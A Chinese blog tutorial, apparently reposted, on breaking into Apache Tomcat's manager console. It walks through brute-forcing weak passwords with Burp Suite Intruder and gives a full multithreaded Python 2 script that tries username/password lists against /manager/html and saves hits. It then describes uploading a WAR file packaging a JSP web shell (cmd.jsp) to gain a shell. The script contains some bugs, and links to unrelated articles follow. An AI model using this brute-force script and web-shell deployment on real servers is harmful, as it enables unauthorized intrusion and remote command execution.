1.tomcat 用burpsuit进行弱口令爆破

先抓包





发送到inturder



payload type 选择custom iterater

第一个payload选用户名文件,第二个payload用 : 第三个选密码文件



设置base64加密,和去掉URL编码



开始攻击,得到用户名密码

2.用python脚本进行爆破

目前正在学习python,

#!/usr/bin/env python

# -*- coding: utf-8 -*-

#by.really

import sys

import requests

import threading

import Queue

import time

import base64

import os

#headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)'}

u=Queue.Queue()

p=Queue.Queue()

n=Queue.Queue()

#def urllist()

urls=open('url.txt','r')

def urllist():

    for url in urls:

        url=url.rstrip()

        u.put(url)

def namelist():

    names=open('name.txt','r')

    for name in names:

        name=name.rstrip()

        n.put(name)

def passlist():

    passwds=open('pass.txt','r')

    for passwd in passwds:

        passwd=passwd.rstrip()

        p.put(passwd)

def weakpass(url):

    namelist()

    while not n.empty():

        name =n.get()

        #print name

        passlist()

        while not p.empty():

            good()

            #name = n.get()

            passwd = p.get()

            #print passwd

            headers = {'Authorization': 'Basic %s==' % (base64.b64encode(name+':'+passwd))}

            try:

                r =requests.get(url,headers=headers,timeout=3)

                #print r.status_code

                if r.status_code==200:

                    print '[turn] ' +url+' '+name+':'+passwd

                    f = open('good.txt','a+')

                    f.write(url+' '+name+':'+passwd+'\n')

                    f.close()

                else:

                    print '[false] ' + url+' '+name+':'+passwd

            except:

                print '[false] '  + url+' '+name+':'+passwd

def list():

    while u.empty():

        url = u.get()

        weakpass(name,url)

def thread():

    urllist()

    tsk=[]

    for i in open('url.txt').read().split('\n'):

        i = i + '/manager/html'

        t = threading.Thread(target=weakpass,args=(i,))

        tsk.append(t)

    for t in tsk:

        t.start()

        t.join(1)

        #print "current has %d threads" % (threading.activeCount() - 1)

def good():

    good_ = 0

    for i in open('good.txt').read().split('\n'):

        good_+=1

    os.system('title "weakpass------good:%s"' % (good_))

if __name__=="__main__":

   # alllist()

    thread()

3.getshell

登录成功上传做好的war包,获得shell



成功

4.war包制作

   jar -cf test.war cmd.jsp

   jar -cf shell.war cmd1/*

WEB中间件--tomcat爆破,burp和python脚本的更多相关文章

  1. 常见web中间件漏洞(四)Tomcat漏洞

    这部分好久没写了,继续更新web中间件漏洞思路整理(不复现) ,争取...整理完 前几篇指路链接: nginx: https://www.cnblogs.com/lcxblogs/p/13596239 ...

  2. nginx tomcat 自动部署python脚本【转】

    #!/usr/bin/env python #--coding:utf8-- import sys,subprocess,os,datetime,paramiko,re local_path='/ho ...

  3. Tomcat口令猜解工具【Python脚本】

    Tomcat 服务器网页部署,登录需用户名/密码,编写了一个简单的Python脚本来测试一些简单的弱口令. 测试环境:Tomcat版本 7.0 登录界面采用basic认证,Base 64加密一下,模拟 ...

  4. 一句话爆破速度提升一千倍python脚本

    这个脚本是接地提供的思路,一句话爆破速度提升一千倍,看了他的帖子然而没有看到工具,思路很牛逼,我提供一个Python脚本本地测试了下,十万密码只需要3秒,速度还是可以的 # coding:utf-8 ...

  5. linux+php+apache web调用python脚本权限问题解决方案

    lamp : linux + apache + mysql + php 在上篇随笔中linux+php+apache调用python脚本时出现的问题的根本原因是:apache运行时使用的apache用 ...

  6. linux+php+apache web调用python脚本权限问题

    lamp : linux + apache + mysql + php 在近期项目中使用 linux + apache + php调用python脚本是出现以下权限问题: build/bdist.li ...

  7. Web安全测试工具 Burp Suit 使用简介

    参考文档: https://blog.csdn.net/gitchat/article/details/79168613 https://www.cnblogs.com/nieliangcai/p/6 ...

  8. web中间件

    0x00 Web中间件概述 通俗来说,中间件是提供系统软件和应用软件之间连接的软件,以便于软件各部件之间的沟通.Apache的Tomcat.IBM公司的WebSphere.BEA公司的WebLogic ...

  9. Web中间件 - 常见漏洞总结

    *文章来源:https://blog.egsec.cn/archives/472 *本文将主要说明:Web中间件常见漏洞的产生原因以及修复方案 什么是Web中间件? 百度百科是这样解释的:中间件是介于 ...

随机推荐

  1. 剑指offer-反转单词顺序列

    题目描述 牛客最近来了一个新员工Fish,每天早晨总是会拿着一本英文杂志,写些句子在本子上.同事Cat对Fish写的内容颇感兴趣,有一天他向Fish借来翻看,但却读不懂它的意思.例如,"st ...

  2. Ajax 调用webservice 解决跨域请求和发布到服务器后本地调用成功外网失败的问题

        webservice 代码 /// <summary> /// MESService 的摘要说明 /// </summary> [WebService(Namespac ...

  3. Dojo API中文 Dojo内容模块概览,初学者

    官网:http://dojotoolkit.org/reference-guide/1.10/dojo/index.html#dojo-dojo的翻译 dojo 内容: dojo dojo/dojo ...

  4. 论文泛读·Adversarial Learning for Neural Dialogue Generation

    原文翻译 导读 这篇文章的主要工作在于应用了对抗训练(adversarial training)的思路来解决开放式对话生成(open-domain dialogue generation)这样一个无监 ...

  5. vue computed 原理

    vue computed 主要依靠数据依赖来更新,这里不展示computed源代码,只展示核心思想. computed: { a(){ return this.b ++ } } data:{ b: 1 ...

  6. (数字IC)低功耗设计入门(八)——物理级低功耗设计&to be continued?

    前面学习了从系统级到门级的低功耗设计,现在简单地了解了一下物理级设计.由于物理级的低功耗设计与后端有关了,这里就不详细学习了.这里主要是学习了一些基本原则,在物理级,进行低功耗设计的基本原则是:    ...

  7. python3全栈开发-socket编程

    一. 客户端/服务器架构 1.硬件C/S架构(打印机) 2.软件C/S架构 互联网中处处是C/S架构 如黄色网站是服务端,你的浏览器是客户端(B/S架构也是C/S架构的一种) 腾讯作为服务端为你提供视 ...

  8. Centos常用命令之:文件操作

    在centos中,常用的文件操作命令有: ◇touch:建置新文件或者修改文件时间◇cat:从第一行开始显示文件内容◇tac:从最后一行开始显示文件内容,和cat相反◇nl:显示的时候,顺道输出行号◇ ...

  9. [HNOI2013]比赛

    题目描述 沫沫非常喜欢看足球赛,但因为沉迷于射箭游戏,错过了最近的一次足球联赛.此次联 赛共N支球队参加,比赛规则如下: (1) 每两支球队之间踢一场比赛. (2) 若平局,两支球队各得1分. (3) ...

  10. 51nod 1376 最长递增子序列的数量(线段树)

    51nod 1376 最长递增子序列的数量 数组A包含N个整数(可能包含相同的值).设S为A的子序列且S中的元素是递增的,则S为A的递增子序列.如果S的长度是所有递增子序列中最长的,则称S为A的最长递 ...